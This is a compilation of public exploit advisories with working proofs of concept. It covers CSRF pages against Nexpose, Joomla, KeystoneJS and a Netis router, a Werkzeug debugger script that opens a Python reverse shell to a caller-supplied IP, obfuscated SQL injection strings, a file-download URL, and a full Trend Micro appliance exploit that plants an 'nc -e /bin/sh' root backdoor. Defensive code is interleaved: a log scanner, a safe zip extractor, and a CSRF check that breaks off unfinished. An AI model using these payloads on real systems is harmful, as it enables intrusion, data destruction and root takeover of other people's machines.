# Exploit Title: [Cross Site Request Forgery at Nexpose Automated Actions]
# Release Date: [2017-12-13]
# Exploit Author: [Shwetabh Vishnoi]
# Link: https://www.linkedin.com/in/shwetabhvishnoi
# Vendor Homepage: [https://www.rapid7.com/]
# Software Link: [https://www.rapid7.com/products/nexpose/download/]
# Tested on: [Windows,Linux,Mac]
# CVE : [CVE-2017-5264]
# Solution: Update to 6.4.66
# Affected Version(s): Rapid7 Nexpose 6.4.65
Rapid7 Nexpose 6.4.13
Rapid7 Nexpose 6.4.12
Rapid7 Nexpose 5.8.6
Rapid7 Nexpose 5.8
Rapid7 Nexpose 5.7.5
Rapid7 Nexpose 5.5.4
Rapid7 Nexpose 5.5.3
Rapid7 Nexpose 5.4.8
Rapid7 Nexpose 5.4.7
Rapid7 Nexpose 5.4.6
Rapid7 Nexpose 5.5.8
Rapid7 Nexpose 5.5.7
Rapid7 Nexpose 5.5.6
Rapid7 Nexpose 5.5.5
Rapid7 Nexpose 5.5.1
Rapid7 Nexpose 5.4.9
Rapid7 Nexpose 5.4.5
Rapid7 Nexpose 5.4.4
Rapid7 Nexpose 5.4.3
Rapid7 Nexpose 5.4.2
Rapid7 Nexpose 5.4.12
Rapid7 Nexpose 5.4.11
Rapid7 Nexpose 5.4.10
Rapid7 Nexpose 5.4.1
Rapid7 Nexpose 5.4
Description: Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack.
Affected URL/endpoint:
https://nexpose-server.com/eso/conductor-service/api/workflows
Proof Of Concept:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"https:\/\/nexpose-server.com\/eso\/conductor-service\/api\/workflows\/",
true);
xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/json");
xhr.withCredentials = true;
var body =
"{\"name\":\"test2\",\"steps\":[{\"serviceName\":\"nexpose\",\"stepConfiguration\":{\"typeName\":\"discover-known-assets\",\"previousTypeName\":\"\",\"configurationParams\":{\"valueClass\":\"Object\",\"objectType\":\"siteMetadata\",\"properties\":{\"siteID\":{\"valueClass\":\"Array\",\"items\":[{\"valueClass\":\"Integer\",\"value\":67}]},\"VULN_CATEGORY\":{\"valueClass\":\"Array\",\"items\":[{\"valueClass\":\"Object\",\"objectType\":\"VULN_CATEGORY_ITEM\",\"properties\":{\"operator\":{\"valueClass\":\"String\",\"value\":\"CONTAINS\"},\"operand1\":{\"valueClass\":\"String\",\"value\":\"dos\"}}}]}}}}},{\"serviceName\":\"nexpose\",\"stepConfiguration\":{\"typeName\":\"tag\",\"previousTypeName\":\"discover-known-assets\",\"configurationParams\":{\"valueClass\":\"Object\",\"objectType\":\"tag\",\"properties\":{\"tagID\":{\"value\":339,\"valueClass\":\"Integer\",\"text\":\"Test\"}}}}}]}";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
#!/usr/bin/env python
import requests
import sys
import re
import urllib

# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
if len(sys.argv) != 5:
    print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
    sys.exit(-1)

# the debugger console only exists when the Werkzeug debugger is enabled
response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
if "Werkzeug " not in response.text:
    print "[-] Debug is not enabled"
    sys.exit(-1)

# the debugger console evaluates Python, so the reverse-connect payload is written in Python
cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' % (sys.argv[3],sys.argv[4])
__debugger__ = 'yes'
frm = '0'

# the console page embeds a 20-character SECRET that every command request must carry
response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
secret = re.findall("[0-9a-zA-Z]{20}",response.text)
if len(secret) != 1:
    print "[-] Impossible to get SECRET"
    sys.exit(-1)
else:
    secret = secret[0]
    print "[+] SECRET is: "+str(secret)

# shell
print "[+] Sending reverse shell to %s:%s, please use netcat listening in %s:%s" % (sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
raw_input("PRESS ENTER TO EXPLOIT")
data = {
    '__debugger__' : __debugger__,
    'cmd' : str(cmd),
    'frm' : frm,
    's' : secret
}
response = requests.get("http://%s:%s/console" % (sys.argv[1],sys.argv[2]), params=data,headers=response.headers)
print "[+] response from server"
print "status code: " + str(response.status_code)
print "response: "+ str(response.text)
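A defender-side companion to the script above, added here and not part of the original exploit: it scans web-server access-log lines for the Werkzeug debugger console being reached or driven (the `/console` path and the `__debugger__`, `cmd` and `s` parameters are the ones the script sends). The log lines are constructed samples in combined-log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2018:10:12:01 +0000] "GET /console HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
10.0.0.5 - - [28/Jan/2018:10:12:03 +0000] "GET /console?__debugger__=yes&cmd=import%20os&frm=0&s=AbCdEfGhIjKlMnOpQrSt HTTP/1.1" 200 212 "-" "python-requests/2.18.4"
10.0.0.9 - - [28/Jan/2018:10:13:44 +0000] "GET /index.html HTTP/1.1" 200 3402 "-" "Mozilla/5.0"
10.0.0.7 - - [28/Jan/2018:10:14:10 +0000] "GET /console HTTP/1.1" 404 209 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Jan/2018:10:15:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify(line):
    """Return (severity, reason) for one access-log line, or None if benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.rstrip("/") != "/console":
        return None
    status = int(m.group("status"))
    qs = parse_qs(parts.query)
    # The console executes the 'cmd' parameter once __debugger__=yes and the
    # page secret 's' are supplied; all of them together is an execution
    # attempt, whatever the response code says.
    if qs.get("__debugger__") == ["yes"] and "cmd" in qs:
        return ("critical", "code execution via debugger console: cmd=%r" % qs["cmd"][0])
    # A 200 for the bare console page means the interactive debugger is exposed.
    if status == 200:
        return ("high", "debugger console reachable (HTTP 200)")
    # Any other answer is still a probe worth recording.
    return ("low", "probe for debugger console (HTTP %d)" % status)


def scan(log_text):
    """Scan access-log text; return a list of (ip, severity, reason) findings."""
    findings = []
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            ip = LOG_RE.match(line).group("ip")
            findings.append((ip, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for ip, sev, reason in scan(SAMPLE_LOG):
        print("%-9s %-15s %s" % (sev.upper(), ip, reason))
```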
# # # # #
# Exploit Title: TSiteBuilder 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/website/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php
#
# User: ' OR 1 -- - Pass: anything
#
# 2)
# http://localhost/[PATH]/site.php?id=[SQL]
#
# %2d%33%36%34%27%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%31%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%21%30%38%38%38%38%43%4f%4e%43%41%54%5f%57%53%2a%2f%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35%33%34%31%34%65%32%30%35%33%34%35%34%65%34%33%34%31%34%65%2c%28%2f%2a%21%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a%21%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74%28%2a%29%2f%2a%21%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%2f%2a%21%30%38%38%38%38%74%61%62%6c%65%5f%6e%61%6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a%21%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2a%2f%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d
#
# 3)
# http://localhost/[PATH]/pagelist.php?id=[SQL]
#
# 4)
# http://localhost/[PATH]/page_new.php?id=[SQL]
#
# # # # #
# # # # #
# Exploit Title: Task Rabbit Clone 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://migrateshop.com/
# Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/pages/single_blog.php?id=[SQL]
#
# %31%20%20%2f%2a%21%31%33%33%33%37%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%33%33%33%37%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
#
# # # # #
<!--
# # # # #
# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/
# Software Download: http://joomsky.com/46/download/1.html
# Version: 1.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6007
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject HTML code, edit tickets, etc.
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">
<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">
<p>[CODE]</p>
</textarea><br>
<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">
<input type="hidden" name="id" id="id" value="1" />
<input type="hidden" name="isoverdue" id="isoverdue" value="0" />
<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />
<input type="hidden" name="c" id="c" value="ticket" />
<input type="hidden" name="task" id="task" value="saveticket" />
<input type="hidden" name="uid" id="uid" value="521" />
<input type="hidden" name="view" id="view" value="ticket" />
<input type="hidden" name="layout" id="layout" value="formticket" />
<input type="hidden" name="check" id="check" value="" />
<input type="hidden" name="option" id="option" value="com_jssupportticket" />
<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>
<input type="hidden" name="update" id="update" value=""/>
</form>
</body>
</html>
# # # # #
# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: https://joomlatag.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
# Version: 5.3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6008
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to download arbitrary files.
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE]
#
# # # # #
# # # # #
# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]
#
# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
#
# # # # #
# # # # #
# Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://vastal.com/
# Software Link: http://vastal.com/buddy-zone-social-networking-script.html
# Version: 2.9.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows a user to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/chat_im/chat_window.php?request_id=[SQL]
#
# -551++/*!13337UNION*/+/*!13337SELECT*/+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+-
#
# http://localhost/[PATH]/search_events.php?category=[SQL]
#
# # # # #
# Exploit Title: Application wide CSRF Bypass
# Date: Sep, 2017
# Exploit Author: Saurabh Banawar
# Vendor Homepage: http://keystonejs.com/
# Software Link: https://github.com/keystonejs/keystone
# Version: 4.0.0
# Tested on: Windows 8.1
# CVE : 2017-16570
Link: https://vuldb.com/?id.109170
Exploit:
<html>
<body>
<form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="name.first" value="Saurabh" />
<input type="hidden" name="name.last" value="Banawar" />
<input type="hidden" name="email"
value="saurabh.banawar@securelayer7.net" />
<input type="hidden" name="password" value="test" />
<input type="hidden" name="password_confirm" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
Summary:
========
The vulnerability is that dlp_policy_upload.cgi allows the upload of a zip file, which is stored at a fixed location: /var/dlp_policy.zip.
The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations:
- /eng_ptn_stores/prod/sensorSDK/data/
- /eng_ptn_stores/prod/sensorSDK/backup_pol/
We can then use a symlink entry in the zip to plant a symlink that points to /opt/TrendMicro/MinorityReport/bin/:
ls -la /eng_ptn_stores/prod/sensorSDK/data/si
lrwxrwxrwx 1 root root 35 Sep 3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/
Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed...
Notes:
======
- For this particular PoC, all I did was exec a bind shell using netcat, showing that there are no firewall protections...
- Auth is bypassed in an alternate poc, so we can attack this with the default password...
Exploitation
============
This is a clever trick: basically, we can't traverse directories, since unzip checks for ../ (even though the spec says it's OK).
We can still exploit this however by extracting a symlink to say a directory and then write into that directory.
For example, if you wanted to link to /tmp you would
ln -s /tmp/ pwn
zip --symlinks -r foo.zip pwn
Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk.
All we need to do now is create another zip file with the folder and file...
zip -r foo.zip pwn/hax.txt
Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python.
So, in summary, the steps to attack this target are:
1. Bypass the auth via XXXX
2. upload a zip with a symlink
3. trigger extraction, crafting the malicious symlink
4. upload another zip with the malicious dlp_kill.sh file
5. trigger extraction, the symlink fires and crushes /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi
Greetz to the busticati, you know who you are. My home boys.
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin
saturn:~ mr_me$ ./poc.py 172.16.175.123 admin123
(+) logged into the target...
(+) performing initial preflight attack...!
(+) uploading the zipped symlink...
(+) successfuly uploaded the zipped symlink
(+) extracting the symlink...
(+) extracted the symlink!
(+) uploading the zipped dlp_kill.sh...
(+) successfuly uploaded the zipped log_cache.sh
(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/...
(+) extracted the dlp_kill.sh file!
(+) starting backdoor...
(+) backdoor started !
(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !
(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
sleep 1;
sid=`pidof sensormain`
if [ "$sid" -eq "" ]; then
break
else
if [ $i -eq 4 ]; then
kill -9 $sid
fi
fi
done
`nc -e /bin/sh -lp 2122>/dev/null`
sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
sleep 1;
sid=`pidof sensormain`
if [ "$sid" -eq "" ]; then
break
else
if [ $i -eq 4 ]; then
kill -9 $sid
fi
fi
done
exit
Cleanup:
========
We just use "sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh" to remove the last line
of the script (the backdoor).
"""
import os
import sys
import time
import zipfile
import requests
import threading
from cStringIO import StringIO

requests.packages.urllib3.disable_warnings()

def _get_bd():
    # the original dlp_kill.sh with one extra line (the command in c) appended
    bd = """#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
sleep 1;
sid=`pidof sensormain`
if [ "$sid" -eq "" ]; then
break
else
if [ $i -eq 4 ]; then
kill -9 $sid
fi
fi
done
`%s>/dev/null`
""" % c
    return bd

def _build_zip(CREATE_SYMLINK=False):
    """
    builds the zip file using a symlink attack into a folder...
    so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory
    and then crush the dlp_kill.sh only to then later get it executed
    resulting in rce as root.
    """
    if CREATE_SYMLINK:
        zipinfo = zipfile.ZipInfo()
        zipinfo.filename = u'si'
        zipinfo.external_attr |= 0120000 << 16L # symlink file type
        zipinfo.compress_type = zipfile.ZIP_STORED
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    if CREATE_SYMLINK:
        # the entry body of a symlink is its target path
        z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")
    else:
        zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")
        zipinfo.external_attr = 0777 << 16L # give full access to the included file
        # backdooring code, as we do
        z.writestr(zipinfo, _get_bd())
    z.close()
    test = open('hax.zip','wb')
    test.write(f.getvalue())
    test.close()
    return f.getvalue()

def we_can_upload_a_zip(CREATE_SYMLINK=False):
    """
    uploads a zip file with the crafted entry inside to our target for exploitation
    """
    multiple_files = {
        'Q_UPLOAD_ID': (None, ''),
        'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),
        'submit': (None, 'Import')
    }
    r = s.post(upload_url, files=multiple_files, verify=False)
    if r.status_code == 200:
        return True
    return False

def unzip():
    # admin_dlp.cgi extracts /var/dlp_policy.zip and (re)starts the sensor via dlp_kill.sh
    try:
        r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)
    except:
        pass
    return True

def we_can_login():
    r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        return True
    return False

def main():
    global c, s, t, p, login_url, unzip_url, upload_url
    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <pass>" % sys.argv[0]
        print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]
        sys.exit(-1)
    t = sys.argv[1]
    p = sys.argv[2]
    bu = "https://%s/" % t
    login_url = "%scgi-bin/logon.cgi" % bu
    unzip_url = "%scgi-bin/admin_dlp.cgi" % bu
    upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu
    s = requests.Session()
    # 1st we bypass auth and login
    if we_can_login():
        # we just use a bind, demonstrating that the target doesnt even have a proper firewall!
        c = "nc -e /bin/sh -lp 2122"
        print "(+) logged into the target..."
        print "(+) performing initial preflight attack...!"
        print "(+) uploading the zipped symlink..."
        # 2nd we upload symlink attack
        if we_can_upload_a_zip(CREATE_SYMLINK=True):
            print "(+) successfuly uploaded the zipped symlink"
            print "(+) extracting the symlink..."
            # 3rd we extract it
            unzip()
            print "(+) extracted the symlink!"
            time.sleep(2) # let the server process things
            print "(+) uploading the zipped dlp_kill.sh..."
            # 4th we upload the backdoor
            if we_can_upload_a_zip(CREATE_SYMLINK=False):
                print "(+) successfuly uploaded the zipped log_cache.sh"
                print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."
                # 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                unzip()
                print "(+) extracted the dlp_kill.sh file!"
                print "(+) starting backdoor..."
                # 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                thread = threading.Thread(target=unzip, args=())
                thread.daemon = True
                thread.start()
                print "(+) backdoor started !"
                print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"
                print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"
                time.sleep(2)
                os.system("nc %s 2122" % t)

if __name__ == '__main__':
    main()
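The Exploitation section of the TDA writeup above turns on two extractor weaknesses: symlink entries are written to disk as symlinks, and a later archive then writes through a planted link. The following extractor, added here as an example and not part of the original advisory or Trend Micro's code, rejects both shapes; the sample archive and directory names are constructed for the demo.

```python
import io
import os
import stat
import tempfile
import zipfile


def build_sample_zip():
    """Constructed archive with the three entry shapes discussed above:
    a symlink entry, a ../ traversal entry and an ordinary file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        link = zipfile.ZipInfo("si")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16   # Unix mode bits: symlink
        z.writestr(link, "/some/target/dir/")                 # a symlink entry's body is its target
        z.writestr(zipfile.ZipInfo("../escape.txt"), b"outside the extraction root\n")
        z.writestr(zipfile.ZipInfo("policy/rules.txt"), b"normal content\n")
    return buf.getvalue()


def entry_problem(info, dest):
    """Return a rejection reason for one ZipInfo, or None if it may be written under dest."""
    mode = info.external_attr >> 16
    if stat.S_ISLNK(mode):
        return "symlink entry"
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest, info.filename))
    if os.path.commonpath([dest_real, target]) != dest_real:
        return "path escapes extraction root"
    # Check every parent component on disk: a link planted by an earlier
    # extraction would redirect this write even when realpath stays inside dest.
    path = dest_real
    for part in info.filename.split("/")[:-1]:
        path = os.path.join(path, part)
        if os.path.islink(path):
            return "parent %r is a symlink" % part
    return None


def safe_extract(zip_bytes, dest):
    """Extract acceptable entries only; return ({name: reason}, [extracted names])."""
    rejected, extracted = {}, []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            reason = entry_problem(info, dest)
            if reason:
                rejected[info.filename] = reason
                continue
            out = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with z.open(info) as src, open(out, "wb") as dst:
                dst.write(src.read())
            extracted.append(info.filename)
    return rejected, extracted


def demo():
    """Extract the sample into a clean directory, then into one where 'policy'
    is already a symlink (the two-stage trick), and return both outcomes."""
    with tempfile.TemporaryDirectory() as dest:
        clean = safe_extract(build_sample_zip(), dest)
    with tempfile.TemporaryDirectory() as dest:
        os.mkdir(os.path.join(dest, "real_bin"))
        os.symlink(os.path.join(dest, "real_bin"), os.path.join(dest, "policy"))
        planted = safe_extract(build_sample_zip(), dest)
    return clean, planted


if __name__ == "__main__":
    clean, planted = demo()
    print("clean dir:    rejected=%s extracted=%s" % clean)
    print("planted link: rejected=%s extracted=%s" % planted)
```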
# Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery (CSRF)
# Date: 28/01/2018
# Exploit Author: Sajibe Kanti
# Author Contact: https://twitter.com/@sajibekantibd
# Vendor Homepage: http://www.netis-systems.com/
# Version: Netis-WF2419, V2.2.36123
# Tested on: Windows 10
#Technical Details & Description:
A cross-site request forgery web vulnerability has been discovered in the
official Netis-WF2419 router.
The vulnerability allows remote attackers to manipulate client-side browser
requests to the web application and so compromise the router by executing
system-specific functions without session protection. A remote attacker is
able to delete the Address Reservation List settings of the Netis router with
cross-site request forgery HTML code.
The vulnerability can be exploited by loading the embedded HTML code in a site
or page. The issue can also be exploited by attackers to externally redirect a
user account to malicious web pages.
The issue requires medium user interaction for exploitation. The request
method used is GET and the attack vector is located on the client side of the
router firmware.
Exploitation of the cross-site request forgery web vulnerability requires no
privileged web application user account and medium or high user interaction.
Successful exploitation results in client-side account theft by client-side
phishing, client-side external redirects and non-persistent manipulation of
application functions that are in use.
The vulnerability can be exploited by remote attackers without a privileged
application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability, follow the
information and steps provided below.
#Manual steps to reproduce the vulnerability :
1. Log in to your Netis router.
2. Now inject or use the HTML code.
3. When the user of the router opens the HTML code in a site or through another
type of redirection, the router's Address Reservation List will be erased!
4. Successful reproduction of the cross-site request forgery vulnerability!
#PoC: Exploitcode :
<html>
<body>
<form action="http://192.168.10.2/cgi-bin-igd/netcore_set.cgi"
method="POST">
<input type="hidden" name="mode_name" value="netcore_set" />
<input type="hidden" name="reserve_address_set" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Note: By loading this HTML code, the whole Address Reservation List will be
erased and the router is left misconfigured!
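Both the Nexpose JSON XHR PoC and the Netis form PoC above work only because the browser attaches the victim's session cookie to a request that originates from another site. The server-side check below, added here as an example and not code from either vendor or author, rejects state-changing requests whose Origin/Referer is missing or foreign and then requires a synchronizer token; the hostnames, token value and request records are constructed for the demo.

```python
import hmac
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

# Constructed demo token; a real token is random and bound to the session.
SESSION_TOKEN = "constructed-demo-token-0123456789"


def same_origin(header_value, expected_host, scheme):
    """True if an Origin or Referer value names exactly scheme://expected_host."""
    parts = urlsplit(header_value)
    return parts.scheme == scheme and parts.netloc.lower() == expected_host.lower()


def csrf_verdict(req, session_token):
    """Decide whether a request may change state.
    req: dict with 'method', 'headers', optional 'form' and 'scheme'.
    Returns (allowed, reason)."""
    method = req["method"].upper()
    headers = req["headers"]
    scheme = req.get("scheme", "https")
    if method in SAFE_METHODS:
        # Safe methods pass here; the fix for a GET that changes state (the
        # router case above) is to not change state on GET at all.
        return (True, "safe method; handler must not change state")
    host = headers.get("Host", "")
    # 1. Source check: browsers attach Origin (or at least Referer) to
    #    cross-site POSTs, so a missing or foreign value fails closed.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return (False, "no Origin/Referer on state-changing request")
    if not same_origin(source, host, scheme):
        return (False, "cross-origin request from %s" % urlsplit(source).netloc)
    # 2. Synchronizer token in a custom header or the body (never a cookie),
    #    compared in constant time against the session's token.
    token = headers.get("X-CSRF-Token") or req.get("form", {}).get("csrf_token", "")
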